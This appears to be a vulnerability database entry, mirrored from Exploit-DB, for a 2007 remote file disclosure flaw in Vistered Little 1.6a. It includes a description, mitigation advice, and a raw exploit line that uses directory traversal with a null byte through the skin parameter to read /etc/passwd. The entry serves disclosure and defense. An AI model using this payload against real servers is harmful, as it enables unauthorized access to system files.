header-logo
Suggest Exploit
vendor:
Vistered Little
by:
Mahmood_ali
5.5
CVSS
MEDIUM
Remote File Disclosure
22
CWE
Product Name: Vistered Little
Affected Version From: 1.6a
Affected Version To: 1.6a
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Vistered Little 1.6a Remote File Disclosure Vulnerability

The exploit allows an attacker to disclose sensitive files on the server by manipulating the skin parameter in the common.css.php script. By using directory traversal techniques, the attacker can access files outside the web root directory, such as the /etc/passwd file.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input for the skin parameter in the common.css.php script. Limit the access rights of the web server user to prevent accessing sensitive files outside the web root directory.
Source

Exploit-DB raw data:

# Vistered Little 1.6a Remote File Disclosure Vulnerability
# Page Script : http://windyroad.org/vistered-little-1.6a.zip
# Exploit : [path]/skins/common.css.php?skin=../../../../../../etc/passwd%00
# Discovered by: Mahmood_ali

# milw0rm.com [2007-05-28]

Navigation

Suggest Exploit

Services By CQR